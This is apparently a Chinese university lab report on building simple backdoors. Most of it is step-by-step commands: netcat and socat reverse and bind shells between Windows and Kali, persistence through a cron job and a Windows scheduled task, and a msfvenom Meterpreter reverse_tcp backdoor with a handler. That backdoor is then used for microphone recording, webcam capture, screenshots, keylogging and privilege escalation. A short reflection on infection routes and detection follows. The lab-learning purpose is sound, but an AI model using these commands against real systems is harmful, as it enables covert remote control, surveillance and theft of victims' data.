一、简单后门
1、ncat、socat的基础操作
工具介绍:
netcat(nc、ncat)是一个底层工具,进行基本的TCP UDP数据收发。常被与其他工具结合使用,起到后门的作用。
socat:类似于Netcat的加强版。
以上两个工具均可以在老师课件主页的附件中下载++https://gitee.com/wildlinux/NetSec/attach_files++
Meterpreter:利用 Metaspolit 的 msfvenom 指令生成后门可执行文件。
操作内容:
1.1Windows与linux间获取Shell
1.1.1 Windows主机获取 Linux Shell
windows:
1、win主机查本机IP地址:ipconfig
由上图可见IPV4的地址为192.168.43.102
2、利用netcat.exe程序监听端口:4330
ps:我将解压好的ncat文件包和socat文件包放在了C:\Users\Mypc\Desktop\网络攻防实验二图片\ncat目录下,所以需要先cd到ncat目录下,然后输入ncat.exe -l -p 4330监听端口4330
kali:
1、使用nc 192.168.43.102 4330 -e /bin/sh指令反向连接Windows主机的4330端口:
2、windows执行linux shell的指令
此时,可以在cmd.exe下运行linux的指令
1.1.2Linux主机获取 Windows shell
linux:
1、查看kali的主机IP地址:ifconfig
上图可以看到kali的主机IP地址为192.168.29.129
2、输入nc -l -p 4330
指令监听端口
windows:
1、在cmd窗口使用 ncat.exe -e cmd.exe 192.168.239.131 4305
命令去连接Linux的4305端口。
2、Linux运行Windows shell
1.2Linux运行Windows shell
1.Windows输入指令ncat.exe -l 4330 监听
2.Linux输入指令nc 192.168.43.102 4305 连接win主机
3.双向传输字符串
1.3 ncat定时启动
1、Windows输入指令ncat.exe -l -p 4330
监听
2、Linux输入指令crontab -e
,选择一个文本编辑器打开,在最后一行添加代码:10 * * * * /bin/netcat 192.168.43.102 4330 -e /bin/sh
在每小时的10分运行ncat回连win主机
3、时间一到就可以运行linux shell指令
1.4 socat 定时启动
1、在windows下依次打开控制面板-管理工具-任务计划,新建一个任务
2、新建触发器
3、新建操作
其中添加参数为:tcp-listen:4330 exec:cmd.exe,pty,stderr
4、运行任务
5、Linux输入指令 socat - tcp:192.168.43.102:4330
, windows主机IP、端口号,此时可以获取win的shell命令
二、体验 MSF Meterpreter 功能
2.1利用msfvenom指令生成后门程序
1、在Linux主机输入指令
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.29.129 LPORT=4330 -f exe > 20154305_backdoor.exe
此条指令意为生成一个.exe程序,名称为 20154330_backdoor,将来在windows上运行时会回连到Linux主机相应端口
2、将生成文件拷贝到windows下(随意目录)
2.2进入控制台设置相关参数
1、linux输入指令msfconsole
2.在msf>下输入命令use exploit/multi/handler
3.输入set payload windows/meterpreter/reverse_tcp
设置payload
4.输入指令set LHOST 192.168.29.129
5.输入指令set LPORT 4330
6.输入指令show options
2.3开始监听
1、Linux输入指令exploit
开始监听
2.windows主机双击后门木马程序执行
3.1输入指令record_mic
录制一段音频
3.2输入指令webcam_snap
拍摄照片
3.3输入指令screenshot
截取屏幕
3.4输入指令keyscan_start
记录击键内容,输入指令keyscan_dump
获取击键记录
3.5输入指令getuid
查看当前用户,输入指令getsystem
提权
三、问题
1.例举你能想到的一个后门进入到你系统中的可能方式?
从网络上下载非正版的软件安装包、压缩包
各种不明来历的信息,链接,还有一些小视频……
移动设备拷贝文件时携带
2.例举你知道的后门如何启动起来(win及linux)的方式?
后门程序与文件或程序绑定,打开文件或程序时,后门启动。
电脑开机时后门程序自动启动。
3.Meterpreter有哪些给你映像深刻的功能?
感觉它超级强大……每个功能都很让我印象深刻!开摄像头,屏幕截图,录音频……完全没有任何隐私,所以以后在软件的安装中要做到尽可能从正规渠道下载,对于一些不明来历的信息,链接不因好奇心而点击,减少系统被植入后门的危险。
4.如何发现自己有系统有没有被安装后门?
如果翻看任务管理器时,机器内存占用非常严重,关掉主要应用程序还是有占用,任务里有并不认识的exe程序,那很有可能就是被安装了后门。
使用杀毒软件,定时经常性的进行全盘查杀
下载文件进程的时候,设置防火墙
四、实验感想
本次实践主要是多种方法linux获取win的shell,winxp获取linux的shell。后门的简单学习,生成一个后门文件,安装在靶机中,控制靶机,就可以得到自己想要得到的信息。Meterpreter,功能很强大,通过实践,也意识到后门程序一旦被启动,那信息被盗取很容易。所以计算机没有绝对的安全,在使用时要避免打开一些不良的或者未知的文件。